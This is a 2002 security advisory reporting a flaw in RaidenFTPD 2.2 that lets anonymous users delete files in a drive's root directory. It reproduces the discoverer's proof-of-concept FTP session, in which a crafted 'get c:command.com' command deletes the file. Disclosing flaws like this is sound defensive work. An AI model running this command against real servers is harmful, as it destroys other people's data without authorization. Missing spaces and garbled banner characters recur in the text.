File Deletion Vulnerability in RaidenFTPD for Windows

Reported January 14, 2002, byTamer Sahin.

VERSIONS AFFECTED

DESCRIPTION
Avulnerability exists in Raiden FTPD 2.2 that lets an attacker delete any file onthe system located in the root directory (c:, d:, etc.).

DEMONSTRATION

The discoverer posted the followingdemonstration as proof-of-concept:

C:>ftp192.168.10.3

Connectedto 192.168.10.3.

220-ThisFTP site is running free version of RaidenFTPD

220-Downloadchinese version from

http://playstation2.idv.tw/raiden-ftpd-site/

220-Downloadenglish version from

http://playstation2.idv.tw/raidenftpd/

220-RaidenFTPD32for RaidenFTPD (up since 2002/01/13 17:07)

220-Thisserver is for private use only

220-Ifyou do not have access to this server

220-Pleasedisconnect now

220Please enter your login name now.

User(192.168.10.3:(none)): anonymous

331Password required for anonymous .

Password:

230-------------------------------------------------------------------

-----+

230-  lvl=level r=root s=superusers n=normal g=guest * = all

userlevels

230-  grp=group n=nukers s=sitebot

230-formore detailed descriptions, please visit raidenftpd homepage

230-http://playstation2.idv.tw/raidenftpd/raiden-ftpd-doc/help-sitecmd

.html

230-------------------------------------------------------------------

-----+

230User anonymous logged in, proceed.

ftp>get c:command.com

Erroropening local file command.com.

>command.com:Permission denied

ftp>quit

221-

221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

--=-=-=-=-

221-                 anonymous , ºAñ¦ñ-ñW¦¦ "0" BYTES, ñU+n "0"

BYTES

221-                 +QºA¦ßí@~~~~S·ñ¯~~~~

221-                 ªA¿úíA+w¬nªAª+Ñ·-{!!!!

221--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=

--=-=-=-=-

221-.

221Goodbye.

Andfile has been deleted!

VENDOR RESPONSE

Thevendor, RaidenFTPD, has beennotified but hasn't issued a patch.

CREDIT
Discovered by TamerSahin of Security Office.